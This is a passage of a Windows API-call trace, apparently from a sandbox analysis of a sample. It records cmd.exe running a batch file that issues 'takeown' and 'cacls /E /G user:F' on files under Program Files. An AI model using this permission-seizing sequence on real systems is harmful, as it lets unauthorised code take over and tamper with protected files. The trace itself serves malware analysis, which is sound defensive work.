_String2="COLOR") returned -14 [0220.460] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0220.460] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0220.460] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0220.460] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0220.460] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0220.460] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0220.460] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0220.460] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0220.460] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0220.460] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0220.460] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0220.460] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0220.460] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0220.460] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0220.460] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0220.460] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0220.461] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0220.461] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0220.461] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0220.461] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0220.461] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0220.461] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0220.461] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0220.461] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0220.461] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0220.461] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0220.461] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0220.461] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0220.461] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0220.461] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0220.461] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0220.461] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0220.461] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0220.461] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0220.461] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0220.461] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0220.461] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0220.461] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0220.461] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0220.461] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0220.461] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0220.461] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0220.461] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0220.461] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0220.461] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0220.461] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0220.461] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0220.461] SetErrorMode (uMode=0x0) returned 0x0 [0220.461] SetErrorMode (uMode=0x1) returned 0x0 [0220.461] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaac510, lpFilePart=0x92ebfc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92ebfc*="Desktop") returned 0x1d [0220.461] SetErrorMode (uMode=0x0) returned 0x1 [0220.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0220.461] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0220.462] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.462] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.462] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xffffffff [0220.462] GetLastError () returned 0x2 [0220.462] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.462] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xffffffff [0220.462] GetLastError () returned 0x2 [0220.462] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xaa0b68 [0220.462] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xffffffff [0220.462] GetLastError () returned 0x2 [0220.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x92e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e988) returned 0xaa0b68 [0220.463] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.463] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0220.463] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0220.463] GetConsoleTitleW (in: lpConsoleTitle=0x92ee7c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.463] InitializeProcThreadAttributeList (in: lpAttributeList=0x92eda8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x92ed8c | out: lpAttributeList=0x92eda8, lpSize=0x92ed8c) returned 1 [0220.463] UpdateProcThreadAttribute (in: lpAttributeList=0x92eda8, dwFlags=0x0, Attribute=0x60001, lpValue=0x92ed94, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x92eda8, lpPreviousValue=0x0) returned 1 [0220.463] GetStartupInfoW (in: lpStartupInfo=0x92ede0 | out: lpStartupInfo=0x92ede0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.463] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.464] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.464] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0220.466] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x92ed30*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x92ed7c | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x92ed7c*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xea8, dwThreadId=0x7e8)) returned 1 [0220.471] CloseHandle (hObject=0xb0) returned 1 [0220.471] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0220.471] GetEnvironmentStringsW () returned 0xaa9df8* [0220.471] FreeEnvironmentStringsA (penv="=") returned 1 [0220.471] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0220.565] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x92ed14 | out: lpExitCode=0x92ed14*=0x0) returned 1 [0220.565] CloseHandle (hObject=0xb8) returned 1 [0220.565] _vsnwprintf (in: _Buffer=0x92edfc, _BufferCount=0x13, _Format="%08X", _ArgList=0x92ed1c | out: _Buffer="00000000") returned 8 [0220.565] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0220.565] GetEnvironmentStringsW () returned 0xaae308* [0220.565] FreeEnvironmentStringsA (penv="=") returned 1 [0220.565] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0220.565] GetEnvironmentStringsW () returned 0xaae308* [0220.565] FreeEnvironmentStringsA (penv="=") returned 1 [0220.565] DeleteProcThreadAttributeList (in: lpAttributeList=0x92eda8 | out: lpAttributeList=0x92eda8) [0220.565] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.565] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0220.570] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.570] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0220.570] _get_osfhandle (_FileHandle=0) returned 0x38 [0220.570] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0220.571] SetConsoleInputExeNameW () returned 0x1 [0220.571] GetConsoleOutputCP () returned 0x1b5 [0220.571] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0220.571] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.571] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x92f53c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0220.571] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0220.571] _get_osfhandle (_FileHandle=3) returned 0xb8 [0220.571] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0220.572] _get_osfhandle (_FileHandle=3) returned 0xb8 [0220.572] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0220.572] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0xc2, lpOverlapped=0x0) returned 1 [0220.572] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0220.572] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0220.572] _get_osfhandle (_FileHandle=3) returned 0xb8 [0220.572] GetFileType (hFile=0xb8) returned 0x1 [0220.572] _get_osfhandle (_FileHandle=3) returned 0xb8 [0220.572] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0220.572] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0220.572] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0220.572] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0220.572] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0220.572] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0220.572] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0220.572] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0220.573] _tell (_FileHandle=3) returned 47 [0220.573] _close (_FileHandle=3) returned 0 [0220.573] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f2d0 | out: _Buffer="\r\n") returned 2 [0220.573] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.573] GetFileType (hFile=0x3c) returned 0x2 [0220.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.573] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2a8 | out: lpMode=0x92f2a8) returned 1 [0220.573] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.573] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f2c0*=0x2) returned 1 [0220.574] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.574] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x92f2cc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0220.574] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x92f2cc | out: _Buffer=">") returned 1 [0220.574] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.574] GetFileType (hFile=0x3c) returned 0x2 [0220.574] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.574] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2ac | out: lpMode=0x92f2ac) returned 1 [0220.574] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.574] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x92f2c4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x92f2c4*=0x1e) returned 1 [0220.575] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.575] GetFileType (hFile=0x3c) returned 0x2 [0220.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.575] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f54c | out: lpMode=0x92f54c) returned 1 [0220.575] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.575] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xaa7838*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x92f564, lpReserved=0x0 | out: lpBuffer=0xaa7838*, lpNumberOfCharsWritten=0x92f564*=0x7) returned 1 [0220.575] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f56c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\" ") returned 61 [0220.575] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.575] GetFileType (hFile=0x3c) returned 0x2 [0220.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.575] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0220.575] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.575] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x3d) returned 1 [0220.576] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f580 | out: _Buffer="\r\n") returned 2 [0220.576] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.576] GetFileType (hFile=0x3c) returned 0x2 [0220.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.576] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f558 | out: lpMode=0x92f558) returned 1 [0220.576] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.576] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f570, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f570*=0x2) returned 1 [0220.576] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0220.576] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0220.576] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0220.576] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0220.576] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0220.576] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0220.576] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0220.577] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0220.577] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0220.577] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0220.577] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0220.577] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0220.577] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0220.577] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0220.577] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0220.577] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0220.577] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0220.577] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0220.577] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0220.577] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0220.577] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0220.577] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0220.577] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0220.577] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0220.577] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0220.577] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0220.577] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0220.577] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0220.577] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0220.577] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0220.577] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0220.577] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0220.577] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0220.577] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0220.577] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0220.577] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0220.577] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0220.577] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0220.577] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0220.577] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0220.577] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0220.577] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0220.577] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0220.577] SetErrorMode (uMode=0x0) returned 0x0 [0220.577] SetErrorMode (uMode=0x1) returned 0x0 [0220.577] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaaf8f0, lpFilePart=0x92f31c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92f31c*="Desktop") returned 0x1d [0220.577] SetErrorMode (uMode=0x0) returned 0x1 [0220.577] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0220.577] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0220.578] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.578] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xffffffff [0220.578] GetLastError () returned 0x2 [0220.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.578] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xffffffff [0220.578] GetLastError () returned 0x2 [0220.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.578] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xaa0b68 [0220.578] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.578] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xffffffff [0220.579] GetLastError () returned 0x2 [0220.579] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xaa0b68 [0220.579] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.579] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0220.579] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0220.579] GetConsoleTitleW (in: lpConsoleTitle=0x92f0f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.579] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0220.579] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0220.579] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0220.579] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0220.579] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0220.579] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0220.579] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0220.579] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0220.579] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0220.579] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0220.579] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0220.579] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0220.579] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0220.579] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0220.579] 